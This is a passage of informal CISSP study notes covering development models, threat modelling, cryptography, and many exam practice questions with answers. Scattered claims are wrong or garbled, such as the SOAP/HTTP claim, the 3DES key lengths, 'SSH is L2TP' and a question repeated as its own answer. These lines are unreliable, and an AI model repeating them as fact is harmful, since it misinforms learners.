message: 3 • Polymorphism: Addy can change behavior based on the context of the input,
overloading the + to perform addition, or concatenation, depending on the context •
Polyinstantiation: Two Addy objects (secret and top-secret), with different data

 Integrated Product and Process Development (IPPD) is the DoD management technique that
simultaneously integrates all essential acquisition activities through the use of Integrated
Product Teams (IPT) to optimize design, manufacturing, and supportability processes. IPT’s
team job is to ensure that Testing & Deployment Env are in sync

 The primary concern introduced in DevOps that was not there in the Traditional methodology -
Separation of Duties.

 Which security model is followed by SDLC - Brewer nash

 Development Methodology - methods

o - Iteractive ( interacting with customers on a regular basis and sharing the status live
Ex: Agile )
o - Non Iteractive ( meet customer and collect the requirements, develop the code and
submit the customer, time taken)

 Non Iterative Methods

o Waterfall method: ( Non - Iteractive) from the perspective of security non - iteractive is
preferred
o Spiral method - other name Nested Version of the waterfall, Proper risk assessment
needs to be performed at each and every phase.
o Cleanroom Zero Defects: Controlling defect, more time spend early stages, risk needs
to be effectively.
 Iterative
o Prototyping: Beta version, based on the feedback they update the code and release the
market.
o Modified Protocol Model (MPM) : Similar to Prototyping, ideal for web application
development
o Rapid Application Development (RAD): Strict time limit to develop applications.
Quality is concern, poor design.
o Joint Analysis Development (JAD): Matrimonial Application Development ( MAD),
Developers to work directly with users to develop a working application,
o Exploratory model: assumptions are made how the systems work.
When to use which Models

 Use the Waterfall model if your project is big and complex.

 Use the Cleanroom model if your project is highly security-oriented, and you are willing to
spend the time and resource to write code correctly the first time.
 85

 Use an Agile model if you want to create high quality code in a time-boxed, focused
manner
 Use the Prototyping model if the customer is not sure exactly what they want.
 Use the Spiral model if you want to iteratively develop software while performing a risk
analysis at the start of each iteration.
 If none of the above software development models works for you, consider other models
such as RAD, JAD, Exploratory, Component-based, or reuse
 Use structured development if you want code that is easy to verify and test.
 Use CASE tools to help automate your application development.

 Entity integrity requires that each entity has a unique key. For example, if every row in a
table represents relationships for a unique entity, the table should have one column or set
of columns that provides a unique identifier for the rows of the table.
 Referential Integrity - The foreign key must exist, if not it will not accept the particular
value.

 A RESTful API is an application program interface (API) that uses HTTP requests to GET,
PUT, POST and DELETE data. A SOAP API is designed to expose certain aspects of an
application's business logic on a server, and SOAP uses a service interface to do this while
REST uses URIs. REST APIs access a resource for data (a URI); SOAP APIs perform an
operation.

 SOAP Vs REST

o Both were created to enable application-layer communication

o HTTP was designed to work with SOAP not REST
o SOAP was designed to overcome the compatibility issues associated with RPC

 There are two types of defensive controls in Database

o Polyinstantiation: Poly ( multiple) Instance ( versions) - Control to defence against
inference attack.
o Polymorphism: Poly ( multiple) control to defence against aggregation attack.

 Knowledge Management:
o A key feature of knowledge management is the application of artificial intelligence
techniques to decision support. AI uses a database in the backend called Knowledge
Discovery in Databases ( KDD) - Mathematical, statistical and visualization method
of identifying valid and useful patterns in data.

 Polymorphic Virus: Multiple Behaviors , after infecting it changes the signature its difficult
to be caught by the antivirus, it's also called stealth virus. A polymorphic virus is a
complicated computer virus that affects data types and functions. It is a self-encrypted
virus designed to avoid detection by a scanner. Upon infection, the polymorphic virus
duplicates itself by creating usable, albeit slightly modified, copies of itself.

 Threat Modelling Concepts

o Threat modelling is a form of risk assessment that models aspects of the attack and
defense
o The focus of threat modelling is to understand: What are we building? What can
go wrong? What are we going to do about that? Did we do a good enough job?
o The attack side of the model looks at vulnerabilities, exploits and attacks, attack
vectors, and threats
o The defense side of the model looks at risks, security controls, and security
objectives
 86

 Common Software Attacks:

o A buffer overflow attack focuses on sending a computer more input data than it can
process
o A Time of Check / Time of Use (TOC/TOU) attack tries to change an operating
system condition after it’s been checked, but before it’s executed
o A redirect and forwarding attack can occur when a web application accepts
unvalidated data that redirects a user to an untrusted web address
o Cross-site scripting (XSS) attacks takes advantage of 3rd party scripting languages to
send unvalidated data to a web application or browser
o A Cross-Site Request Forgery (CSRF) attack focuses on tricking a user to perform
unwanted actions on a web application
o An injection attack sends untrusted data to a command interpreter in an attempt
to manipulate data
o A drive-by download attack occurs when software is downloaded without the
knowledge of the victim
o A backdoor attack bypasses authorized security controls, communication channels,
and other authorized means to access system information
 The NIST threat model steps are:
o 1. Identify and characterize the system and data of interest
o 2. Identify and select the attack vectors to be included in the model
o 3. Characterize the security controls for mitigating the attack vectors
o 4. Analyze the threat model
 Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of
Privilege (STRIDE) threat model was created by Microsoft
 The OWASP Threat Model steps are:
o Analyze trust boundaries to and within the solution that we build
o Analyze the actors that interact within and outside of the trust boundaries
o Analyze information flows within and to and from the trust boundaries
o Analyze information persistence within and out of trust boundaries
o Analyze trust boundaries to and within the solution that we build
o Analyze the actors that interact within and outside of the trust boundaries
o Analyze information flows within and to and from the trust boundaries
o Analyze information persistence within and out of trust boundaries

Other
 Pentest Report should not given to anyone except senior management
 Risk Management is part of Due Diligence Process
 Dark Web Monitoring - Dark web monitoring, also known as cyber monitoring, is an identity
theft prevention product that enables you to monitor your identity information on the dark
web, and receive notifications if your information is found online.
 Pass the Cache is common attack for Mac, Unix, Linux
 Mimikatz is a well known tool to attack AD & Kerberos
 BloodHond – AD Attack Paths
 SSL belongs to Transport Layer
 MAC provides more security and least functionality
 MD2 is vulnerable for collision
 Side Channel attacks are passive attack
 Digital Signature – Integrity & Authenticity
 Horizontal Privilege Escalation less impact of confidentiality then vertical
 CC Components – PP, TOE, ST, Security Assurance Requirements, Evaluation Process & Level
Assignment
 87

 TLS will provide confidentiality for APIs

 Decision Support System Vs Expert System – Expert system is operational driven and the
decisions made by input parameters will be automated. A Decision Support System is
informational driven where the output is meant to help reach a decision or even provides
multiple decisions options. Expert system falls into AI, Decision Support systems not
 3DES can work in different modes, and the mode chosen dictates the number of keys used and
what functions are carried out:
o DES-EEE3 Uses three different keys for encryption, and the data are encrypted,
encrypted, encrypted.-112
o DES-EDE3 Uses three different keys for encryption, and the data are encrypted,
decrypted, and encrypted.
o DES-EEE2 The same as DES-EEE3 but uses only two keys, and the first and third
encryption processes use the same key.-112
o DES-EDE2 The same as DES-EDE3 but uses only two keys, and the first and third
encryption processes use the same key.-168
 IMP Protocols
o SIP – Layer 7 Protocol VoIP
o SKIP – Layer 3 protocol to integrate with IPSec replaced by IKE
o SLIP – Layer 2 Dial-Up Protocol
o SKIPJACK – Encryption Algorithm
 Accreditation Types:
o System – Single System or Application
o Site – Systems/Applications within a single e self-contained location
o Type – Systems/Applications that are distributed over a number of locations

LAST DAY QUESTIONS:

 If you are using a synchronous token device, what does this mean? – The device synchronizes
with the authentication service by using the time or event synchronization
 Explicit Access Control – Use of specific account for specific users
 Not benefit of a One-time password - It prevents reusing the password more than 3 times.
 Which is sometimes planned and implemented by power companies when their demand for
power is unusually high? – Brownout
 The magnitude of loss pertaining to physical damage includes the - Cost of replacing the device
and data and the cost from service interruptions
 Which of the following is not a reason that a company would implement NAT? - The company
wants to save money and use public addresses
 Which of the following is not a disadvantage of firewalls? - They usually do not protect against
viruses.
 Which of the following services does IPSec not provide – Availability
 All secure e-mail systems work basically the same way. What is the usual way of getting a
session key to the receiver? - Encrypt session key with receiver’s public key
 What is a simulation test? - . Test goes right up to the point of actual relocation to an
alternate site.
 Administrative or regulatory law applies to which of the following situations? - An organization
does not meet industry specific standards
 How do polymorphic viruses work? - They alter their own code
 What is the main difference between TCSEC and ITSEC? - TCSEC does not rate assurance and
functionality separately.
 What is the difference between B3 and A1? - A1 uses more formal methods of reviewing the
systems design
 Which did not go into forming the Common Criteria? - TCSES
 Which describes a lattice-based access control scheme? - A model that provides an upper bound
and lower bound of access capabilities
 What best describes a state machine model? - A state machine stays in a secure state if all
transitions are secure and system begins in a secure state.
 88

 Auditing (actual event logging) is what type of control? – Technical

 What is a control zone? - Area that blocks electrical signals
 What is not used to suppress a “Class C” fire? – Water
 Which area is not important to have a fire detection or sensor installed? - Under the awning
 How does an Artificial Neural Network work? - It uses units that mimic neurons
 Which of the following controls might force a person in the operations department into
collusion with a person that works in a different department in order to gain access to
unauthorized data? - Limiting the local access of operations personnel
 Which of the following is not a protocol used in VPN solution? – l2p
 Which best describes a VLAN? - A method to enable an administrator to group users and devices
based on issues other then physical location
 What is source routing? - Data that is within a packet’s header which indicates how it is to get
to its destination
 Which is not true about fair cryptosystems? - It uses a tamperproof chip
 Which does not describe a characteristic of the Clipper Chip? - It is a software-based escrow
solution.
 Which is unbreakable by an exhaustive search and brute force attack? - One-time pad
 Which is not a proactive way of making sure that the disaster recovery plan does not go out of
date? - Make backup copies and store it at an off-site facility
 Which of the following is not a reason that disaster recovery and continuity plans go out of
date? - They are part of normal business decisions
 Which of the following best describes criminal law? - It is used when an individual violates a law
put in place to protect the public
 If a database had a concurrency problem, what would that mean?- There is a data integrity
problem
 What happens at the design specification stage of a project? - The design maps to more
granular software components and procedures
 What are the two things that Clark-Wilson model uses to enforce integrity? - Separation of
duties and access triple
 Which is true about the Biba model? - A model that enforces the first rule of integrity
 Which of the following is a true statement? - Protection rings are concentric rings that increase
with privilege as the number decreases.
 Which is not an advantage of the qualitative risk analysis method? - Produces values in
monetary terms
 An organization working in a peer-to-peer relationship and not using a centralized domain
controller falls into which of the following? - An example of decentralized administration
 Remote access using a token device along with a PIN is an example of which of the following? -
Two-Factor authentication
 Which type of fire detector reacts to light blockage by smoke? - Optical detector
 Which of the following is the best definition of noise pertaining to power lines? - Random
disturbance that can be caused by EMI or RFI
 In database lingo, what is an attribute? – Column
 How is data hiding accomplished? - Modularity of objects, which do not show their data and
operations
 Which of the following is not true about FDDI? - It has dual rings traveling in the same direction
 Which of the following is not a characteristic of 10Base2? – 100 Mbps
 Which of the following is not an example of a symmetric key algorithm? – RSA
 Which site is better for companies that require unusual hardware and/or software and
proprietary devices? - Warm site
 Which is not true about developing and implementing a disaster recovery and continuity plan? -
The plan should restore the least critical systems first.
 Which approach is the best for development and support of the disaster recovery plan? - Top-
down approach
 When attempting to collect evidence at a computer crime scene, which is not a barrier to the
process? - Data diddling is an important tricky method of obtaining data
 Which is not true pertaining to different countries and how they deal with computer crime? -
Nations agree on how evidence should be collected and used in computer crime investigations
 When is information no longer protected under the trade secret law? - When a company does
not protect it properly
 89

 Why can a purely qualitative risk analysis not be performed? - Why can a purely qualitative risk
analysis not be performed?
 Which of the following would not be a delayed loss accrued from a risk? - Increased Income
 How is layering and data hiding used as a protection mechanism? - Processes work in different
layers with no interfaces between layers
 Why should processes be given least privilege rights? - So they do not process data that resides
in another security domain
 What is the purpose of execution domains? - To protect from deliberate or accidental
tampering of instructions by processes
 Which describes the design requirements of a reference monitor for it to fulfill its security role?
- Its validation mechanism must be small enough to be subject to analysis and tests
 Which of the following best describes the exchange that takes place in a SSL connection
between a server and a client? - The client creates a session key and encrypts it with the server
public key After the completion of SSL handshake Symmetric session key is used
 What level of protection does TCSEC/ITSEC C2/E2 rating provide? - Discretionary security
protection
 Which of the following advances to microprocessor architecture has increased some
vulnerabilities? - Increase in processing power
 Which of the following best describes a characteristic of IPSec? - It provides system
authentication
 What components are needed to perform a smurf attack? - Attacker, victim, amplifying network
 Which of the following best describes the issue of an ARP attack? - Proper IP to MAC address
translation is spoofed, which causes masquerading
 Which of the following is a proper characteristic of SKIP and ISAKMP? - They work at the
network layer
 Which of the following is a reason companies implement routers and packet filters? - To provide
protection that is transparent to users
 What does AES use S-boxes for during encryption process? - Substitution
 Which of the following statements is not true? - 3DES has a mode that uses 1 key
 Which of the following is a cryptosystem that uses a session key? – pgp
 Which of the following cannot be detected by intrusion detection systems? - An attack coming
in through a SSL connection
 Which of the following is a transmission protocol not usually used on LANs? – FDDI
 Which of the following is required for LAN and WAN centralized access control technologies? -
Secure system with a database of authentication information
 Which of the following is a true characteristic of the SHA algorithm? - Produces a 160-bit
message digest
 What is the purpose of implementing data classifications? - Indicate how data should be
protected
 Which of the following is the most critical component for systems that will provide integrity? –
System Design
 How does a SOCKS-based firewall provide protection? - By acting as a proxy
 How does PPTP provide protection? - Through encryption and encapsulation
 When would computer generated materials be admissible in court ? - If it was created during
normal business functions
 Which of the following is required for cryptanalysis? - Access to ciphertext and algorithm source
 Controls that verify data going into applications and systems and the resulting output are what
type of controls? - Operations
 Which of the following is an example of shoulder surfing? - Recording screen shots of another
user’s computer with a video recorder
 Firewall - They do protect an internal network from an external network
 Parallel Test - Systems are run concurrently at both of the sites
 Which is not a downfall of a reciprocal agreement? – It is cheap
 Administrative or regulatory law applies to which of the following situations? - An organization
does not meet industry specific standards.
 Which book in the Rainbow Series pertains to network security? – Red Book
 Difference Between B3 and A1 - A1 uses more formal methods of reviewing the systems design.
 Control Zone - Area that blocks electrical signals
 What type of material burns in "Class A", "Class B", and "Class C" fires?- Wood, liquid, and
electrical equipment
 90

 High Cohesion - If an object can perform a function without help from other objects it has high
cohesion
 What does it mean if a message is in open message format- The data is encrypted with the
sender’s private key
 Which of the following is not a reason that disaster recovery and continuity plans go out of
date? - They are part of normal business decisions
 If a database had a concurrency problem, what would that mean?- There is a data integrity
problem
 When determining the value of information, which attribute is not necessary to evaluate? – Cost
to Present
 If a database had a concurrency problem, what would that mean? - There is a data integrity
problem
 What happens at the design specification stage of a project? - The design maps to more
granular software components and procedures
 What is the purpose of abstraction? - To be able to look at the individual components of a
project

 Which is not true about a one-way trapdoor function?

 A It is a mathematical function that is easier to compute in one direction than the opposite
direction. (Your Answer)
B. The forward direction of a one-way function can take seconds to encrypt and the
opposite direction could take years to perform.
C. One-way function is used in symmetric key cryptography because they have to know
about the trapdoor to decrypt. (Correct Answer)
D.RSA is based on the trapdoor one-way function.

Larry IMP Questions:

 The ISC2 Code of Ethics specifically states “When resolving differing laws in different
jurisdictions, give preference to the laws of the jurisdiction in which you render your service”.
 After an audit reports differences between a current position and a desired position, gap
analysis is performed to determine the best ways to reconcile the differences.
 ISO/IEC 27002 (formerly ISO/IEC 17799) is a nonbinding guideline only. The other answers listed
requirements. As such, it provides:
 “WIPO is the global forum for intellectual property services, policy, information and
cooperation. We are a self-funding agency of the United Nations, with 189 member states.”
 When an architect develops a design, part of the design includes a checklist for developers to
follow. By comparing their work to the checklist, the subject matter ensures or “verifies”
follow the design of the architect.
 Public Key always challenge of spoofing
 After a policy specifying the requirements for data handling is developed, for example the
requirement to encrypt, standards must then be determined, for example AES. After this
baselines, procedures and guidelines can be addressed.
 The original use of the first publicly known asymmetric algorithm (Diffie Hellman or DH) was to
solve the problem of sharing symmetric keys. Later algorithms (RSA) showed a way to also
authenticate hash values (signing). The most efficient asymmetric algorithms in use today,
appear to be based on Elliptical Curves. When used for Key Agreement it is called ECDH for
Elliptical Curve Diffie Hellman and when used for signing it is known as ECDSA for Elliptical
Curve Digital Signature Algorithm.
 Ciphertext Only Attack – Side Channel & Brute Force
 The most important attribute of a control is that it achieves security objectives with minimal
impact to the users. Only user management understands this impact.
 Risks should be prevented if possible and cost effective. A cost benefit analysis weighs the cost
of the control against the value of the asset to an organization. When it is determined that it is
 91

more cost effective to accept the risk, then it is imperative that controls to detect and respond
to the risk are implemented, i.e. business continuity plans and procedures.
 All Common Criteria certifications require a vendor provided security target. While it is
desirable to also rate a system against a vendor neutral protection profile, it is not required
 The reference monitor is the policy of an operating system, enforced by the security kernel
 The Security Target is written by a vendor and must be supplied by the vendor to be considered
for certification
 ISO/IEC 15408 or Common Criteria, provides 3rd party certification for information technology
security evaluations. These tests are to ensure a products has features (functionality) it claims
and how well these features are implemented (assurance)
 To validate the server certificate, the issuing CA (the certificate authority) must be trusted by
the client. This is a common problem for companies that use private certificate authorities
 CRLs are entire lists of revoked certificates and present performance issues. When a client
checks and OCSP server, they only request the state of a particular certificate by using the
serial number to identify the certificate and can perform much faster.
 When an organization uses a subordinate CA, they must supply the client with both the server's
CA and the subordinate CA's certificate. To ensure that the client has the most updated root
CA's certificate (which would be used to sign the subordinate CA's certificate, the server often
also provides the most updated root' CA's certificate as well. For example this is typically what
happens when someone connects to any Google server
 Stream ciphers, for example RC4, encrypt a bit at a time, by replacing or substituting the
original bit with the results of an XOR function with the “key stream”. Block ciphers however,
will also change the positions of a group or “block” of bits, much the way someone would
shuffle a deck of cards and are considered much stronger. The use of stream ciphers today is
greatly discouraged. Starting in 2014, most browsers have dropped support for RC4
 ECDSA stands for Elliptical Curve Digital Signature Algorithm. When an asymmetric algorithm
authenticates a hash value, this is known as signing. ECDH (sometimes called ECDHE, with DH
for Diffie Hellman), is used for session key agreement.
 The strike plate or door catch is part of the locking system. It is a common weakness in physical
security, as no matter how strong a lock is, if the strike plate is weak, the door can be
breached
 If an access badge is used only for ingress authentication, a subject can then pass the badge to
another subject for reuse. By requiring the original subject to first badge out before it can be
used for another ingress, this vulnerability is greatly mitigated.
 They are inversely proportional. For example, a short focal length creates a wider field of view.
 It is likely that Bob connected to a rogue access point. Mutual authentication refers to
authentication at both ends of a connection. It is one of the more overlooked features in
authentication. When a person uses their ATM card and PIN they are proving who they are to
the system. What assurance is provided to the person the ATM itself is not counterfeit? Smart
Cards implementations allow for mutual authentication. This is the primary reason that are
preferred over simple memory cards.
 Explanation: Authentication Header (AH) checks the integrity of an IP address and is
intrinsically incompatible with Network Address Translation (NAT). There are modifications that
allow for AH to function through NAT but are not very widespread. _Due to many of the
configuration challenges with IPSec, many organizations have migrated to SSL based VPNs.
These are by comparison much easier to administer.
 If an attacker knows the rules of an IDS, they may be able to mislead the IDS by injecting false
data making an attack sneak through because it did not exactly match the rules for a given
attack. Similar to this is sending in an attack that contains signatures for both a low risk and
high risk attack to direct the IDS to misclassify an attack
 The formula to create the data encryption key or Pairwise Transient Key (PTK) includes the
access point's MAC, the station's MAC, a NONCE from each partner and a value known as the
Pairwise Master Key. If using personal mode of WPA2, this is the phassphrase used to
authenticate. When someone “cracks” WPA2, it is typically through a dictionary attack against
the PMK. This is not a problem in Enterprise Mode.
 If a system only hashes the value of a password, then an attacker could could use a database of
all the possible hashes given a password length, known as Rainbow Tables. To defend against
such attacks, it is considered best practice to add another value or “Salt” the password. There
was a famous compromise of LinkIn where their database of password hashes were not salted
and exposed a lot users.
 92

 The first standardized authentication protocol was the Password Authentication Protocol (PAP).
PAP sends credentials (passwords) in clear text and should be avoided. To protect the password
from interception and replay attacks, CHAP (RFC-1994) was developed. However, CHAP is still
for passwords only. To enable the use of other technologies (passphrases, tokens, biometrics,
etc) standard Extensible Authentication Protocol (EAP) was developed. While originally only
supported on PPP networks, EAP is now supported on LANs as EAPoL (EAP over LAN) also known
as 802.1x
 A test is typically used to determine if a system, plan, procedure, etc actually works and
exercising is having people go through the plan, procedure, etc to ensure the people know how
to perform the steps.
 Depending on the size and publicity of an organization, they may be the subject of multiple
attacks by entities from around the world. If a penetration test is being conducted at the same
time an actual attack successfully penetrates a network, it is imperative to have the IP
addresses of the testing machines, to be able to properly respond.
 Vulnerabilities do not mean there is a risk. Before making initiating any changes, an impact
analysis should be performed to determine if the vulnerabilities present a significant threat to
the organization.
 ICMP is typically used to relay network status messages. However, since an ICMP packet can
contain data, attackers have exploited this feature to use ICMP as a covert channel. OF the
answers provided, it would be likely that a tester would attempt such an exploit to see of an
IDS would detect such an attack
 One very important administrative control when planning a penetration test is the creation of a
“Rules of Engagement” document, which addresses what systems are to be tested, and the
accepted testing techniques. Performing a test entails risk and care must be taken to ensure
the least amount of disruption.
 Just as one cannot continue to drive using a spare tire that does not provide the same service
levels as a normal tire, an organization cannot stay in recovery mode. The disaster is not over
until the operations return to normal service levels. The other answers referred to Recovery.
The questions was in regards to Reconstitution
 Requirements (both functional and assurance) Analysis is where the customer- specific needs
are determined, a very detailed “what the system must do.” System design is more associated
with how the specifications are determined; project initiation is not very detailed. Validations
is during testing and represents that it meets requirements.
 A module is cohesive when it performs only a single precise task. Coupling refers to the
measure of interaction. Both can have a significant affect on change management. It is usually
desirable to have high cohesion and loose coupling
 Before making this significant change, the module should be technically tested (certification)
and administratively approved (accreditation)
 If an operating system is fully patched and configured well, the most likely way to get past the
security provided by the system is to trick a user into trusting software that contains malicious
code. This is how a trojan basically works, by trick a user into accepting something that has a
payload that will cause damage, for example a smart watch with a device driver that installs a
key logger.

Other Questions:

 Intent of DR Testing is Update the Plan

 SSH is L2TP Internet Protocol Security Connection
 GRE Header is inserted between Delivery Header and Payload
 Digital Cert – TLS – A Server Identity & Data Confidentiality
 PKI Lifecycle Phase – Issued Phase
 PPP – LCP
 Security Process Data Collection – Quarterly
 HOST VM Monitor Audit Logs – for Security
 Continuous Security Monitoring – Visibility
 Data Classification Scheme – Authenticity
 Developing – Security, Test & Evaluation – Management, Operational & Technical
 Authenticity – Integrity & Non Repudiation
 SAR – Inventory HW & SW
 93

 ISCM – Before and After Change

 GSM – Global System for Mobile Communication – Vulnerability to conversation Hijaking
 Authenticity of Original Piece of Work – Digital Signature by Timestamp Authority
 VPN Solution Security Risk – Remote User with Admin Rights
 Virtual Machine can exploit multiple VM
 Authenticity = Authentication+ Non-repudation
 Tier 4 DC – Application
 Steganography – Statistical Analysis
 Conveying the result of Security Assessment – ISSM
 Out-dated Inventories – Greatest Risk
 Data Classification too much Granularity – Difficult to assign ownership of Data
 Application Security – Develop Independence App Modules
 SSO – Assurance & Accountability
 Chain Of Custody – Non Repudiation
 Security Feature of GSM – Global Systems for Mobile Communications – It uses a SIM for
authentication
 Assurance of Security in authorization processes to force the Organization to make
conscious risks decisions
 ATM from Skimming control – Anti-Tempering
 Common initialization problem in program will be addressed by Static Analysis
 Partial PKI – Servers having Digital Certificate – Servers can themselves authenticate to
client
 Cloud Contract – Identification of Data Location
 Ref Monitor – Its validation mechanism must be small enough to be carried out by kernel
 Network Sniffers – Presence and activities are not auditable
 SKIP & ISAMKP – work on Network Layer
 Admissible in Court – Created during normal business functions
 Reduce collusion – Rotation of Duty
 Cryptanalysis – Need access of Ciphertext & Algorithm source
 Pseudo Flow – Code inserted to trap intruders
 Wireless Communication Threat – Eavesdropping
 Preventing Cloning of RFID based access card – Personal Identity Verification
 SSL & TLS provides header encapsulation over HTTP
 Public Key Certificates – Authenticate the user’s public key
 Common Characteristic of Privacy -
94
95